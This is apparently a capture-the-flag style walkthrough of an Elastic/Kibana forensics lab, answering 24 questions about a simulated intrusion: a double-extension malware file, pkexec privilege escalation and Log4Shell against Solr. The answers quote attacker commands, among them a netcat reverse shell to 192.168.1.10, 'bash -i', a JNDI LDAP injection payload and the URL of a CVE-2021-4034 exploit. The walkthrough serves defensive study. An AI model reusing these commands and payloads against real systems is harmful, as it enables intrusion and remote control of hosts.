Elastic-Case

An attacker was able to trick an employee into downloading a suspicious file and running it. The attacker compromised the system; on top of that, the security team had not updated most systems...

After downloading the file, we have to unzip it and then open it using VMware (I faced a problem when trying to open it with VMware Workstation Pro 17), so I opened it using VirtualBox.

It will ask you for the username/password; it is elastic/elastic.

Wait for a minute, then access Kibana from the host machine via http://127.0.0.1:5601

Now all is ready.

Q1 Who downloads the malicious file which has a double extension?

For this question I tried to search for HTTP "GET" requests, but there was nothing.

I tried to filter with file.name : *.*.*, but there were 23,000 events.

Then I tried to search in the Security alerts, and here it is: I found many alerts about files.

So I tried to filter them using the filter: file.name : *.*.*

I found that there are files ending with .pdf.exe (users cybery and Ahmed).

From the timeline, the first alert was raised by Ahmed; then cybery opened the file again.

Answer: Ahmed

Q2 What is the hostname he was using?

From the previous screen, it is DESKTOP-Q1SL9P2.

Answer: DESKTOP-Q1SL9P2

Q3 What is the name of the malicious file?

From the previous screen.

Answer: Acount_details.pdf.exe

Q4 What is the attacker's IP address?

From the previous screen, click "Analyze event", then in the network section find the destination address: 192.168.1.10

Answer: 192.168.1.10

Q5 Another user with high privilege runs the same malicious file. What is the username?

From the answer to Q1, he is cybery.

Answer: cybery

Q6 The attacker was able to upload a DLL file of size 8704. What is the file name?

Filter on the mentioned size (8704) and on file names with the .dll extension.

Answer: mCblHDgWP.dll

Q7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

Filter on the pid and the winlog user domain with the following filter:

winlog.user.domain : "NT AUTHORITY" and process.pid : 10716

Then go to process.parent.name in the left panel: there are cmd.exe and rundll32.exe.

After some investigation: cmd.exe opened rundll32.exe, which then opened a cmd.exe with more privileges.

I found it when I looked at the alerts.

So the process with pid 10716 is cmd.exe and its parent is rundll32.exe.

Answer: rundll32.exe
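The parent chain above was read off Kibana by hand; the following added example (my code, not part of the original writeup) does the same walk over ECS-style process events and also flags the point where a child runs as NT AUTHORITY while its parent did not. The events are constructed sample data that mirror the chain described above; every pid except 10716 is made up.

```python
# Reconstruct a process's ancestry from process.pid / process.parent.pid fields and
# spot the privilege jump described in Q7. Sample events are constructed; only the
# pid 10716 and the process names come from the writeup.

# Constructed events: each record carries the process's own pid/name and its parent's.
EVENTS = [
    {"process": {"pid": 4120, "name": "explorer.exe", "parent": {"pid": 800, "name": "userinit.exe"}},
     "winlog": {"user": {"domain": "DESKTOP-Q1SL9P2"}}},
    {"process": {"pid": 5532, "name": "cmd.exe", "parent": {"pid": 4120, "name": "explorer.exe"}},
     "winlog": {"user": {"domain": "DESKTOP-Q1SL9P2"}}},
    {"process": {"pid": 7208, "name": "rundll32.exe", "parent": {"pid": 5532, "name": "cmd.exe"}},
     "winlog": {"user": {"domain": "DESKTOP-Q1SL9P2"}}},
    {"process": {"pid": 10716, "name": "cmd.exe", "parent": {"pid": 7208, "name": "rundll32.exe"}},
     "winlog": {"user": {"domain": "NT AUTHORITY"}}},
]

def index_by_pid(events):
    """Map each pid to the event that describes that process (last one wins)."""
    return {e["process"]["pid"]: e for e in events}

def parent_chain(events, pid, max_depth=32):
    """Return [name(pid), name(parent), name(grandparent), ...] by following
    process.parent.pid. Stops at an unknown pid, on a cycle (bogus parent pointers)
    or at max_depth, so it always terminates."""
    by_pid = index_by_pid(events)
    chain, seen, cur = [], set(), pid
    while cur in by_pid and cur not in seen and len(chain) < max_depth:
        seen.add(cur)
        proc = by_pid[cur]["process"]
        chain.append(proc["name"])
        cur = proc["parent"]["pid"]
    return chain

def privileged_children(events, domain="NT AUTHORITY"):
    """List (pid, name, parent name) for processes running under `domain` whose
    parent ran under a different domain: the privilege jump the writeup describes."""
    by_pid = index_by_pid(events)
    hits = []
    for e in events:
        if e["winlog"]["user"]["domain"] != domain:
            continue
        parent = by_pid.get(e["process"]["parent"]["pid"])
        if parent and parent["winlog"]["user"]["domain"] != domain:
            hits.append((e["process"]["pid"], e["process"]["name"], parent["process"]["name"]))
    return hits

if __name__ == "__main__":
    print(" <- ".join(parent_chain(EVENTS, 10716)))  # cmd.exe <- rundll32.exe <- cmd.exe <- explorer.exe
    print(privileged_children(EVENTS))               # [(10716, 'cmd.exe', 'rundll32.exe')]
```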

Q8 The previous process was able to access a registry. What is the full path of the registry?

Filter on the process with the following filter:

process.name : "rundll32.exe"

Then look at the registry key field in the left panel.

Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

Q9 PowerShell process with pid 8836 changed a file in the system. What was that filename?

Let us filter on the process with the following filter:

process.pid : 8836 and event.action : "overwrite"

Here it is; look at the file name to find the answer.

Answer: ModuleAnalysisCache

Q10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

We have the pid, the file extension and the action type, so we can find it easily with the following filter:

process.pid : 11676 and event.action : "creation" and file.name : *.ps1

Now look at the timestamps; the answer is in the first event.

Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

Q11 What is the machine's IP address that is in the same LAN as a windows machine?

From Security go to Network, then filter host.os.name : "Windows"

So that is the mentioned IP: 192.168.10.10, and the needed IP must be in 192.168.10.(2-254), as it is in the same LAN.

After some investigation of the IPs, there is a suitable IP: 192.168.10.30

Answer: 192.168.10.30

Q12 The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

From Security > Hosts, scroll down, then select Ubuntu.

Now look at the Authentications; Salem is the last successful attempt by the attacker.

Answer: Salem

Q13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

OK, we have a tool: wget, the attacker's username: Salem, and we have to find the URL.

From the previous screen,

I tried to find it by looking at the user activity, and here it is.

Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

Q14 After The attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?

Again, make a filter to find a process named pkexec where the user was Salem, as follows:

process.name : pkexec and group.name : "salem"

Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

Q15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

We have the process pid: 3011 and the user name: root, so make a filter:

process.pid : 3011 and user.name : root

Finally, go to process.command_line on the left.

Answer: bash -i

Q16 What is the hostname which alert signal.rule.name: "Netcat Network Activity"?

For this question, let us investigate in the Security tab - Alerts, then filter with the following filter:

signal.rule.name : "Netcat Network Activity"

Answer: centOS

Q17 What is the username who ran netcat?

From the previous screenshot, it is solr.

Answer: solr

Q18 What is the parent process name of netcat?

From the same screen, let us investigate more deeply by selecting "Analyze event".

Answer: Java

Q19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

From the analyzer tab, make a filter on the process name, and look at the parent process command line in the results.

Answer: nc -e /bin/bash 192.168.1.10 9999

Q20 From the previous three questions, you may remember a famous java vulnerability. What is it?

Answer: Log4Shell

Q21 What is the entire log file path of the "solr" application?

Filter for the user solr, then look at the file path in the left panel.

Answer: /var/solr/logs/solr.log

Q22 What is the path that is vulnerable to log4j?

I filtered many times on the captured files until I found the answer:

Go to filebeat-*, filter: log.file.path : solr

Answer: /admin/cores

Q23 What is the GET request parameter used to deliver log4j payload?

Actually, I used Google to find out the payload and found that...

So I tried to filter with the payload to be sure that it is the answer.

Yes, that is right.

Answer: foo

Q24 What is the JNDI payload that is connected to the LDAP port?

from the previous screen.

Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

Hope this writeup helped you; for questions feel free to message me.

Thank you
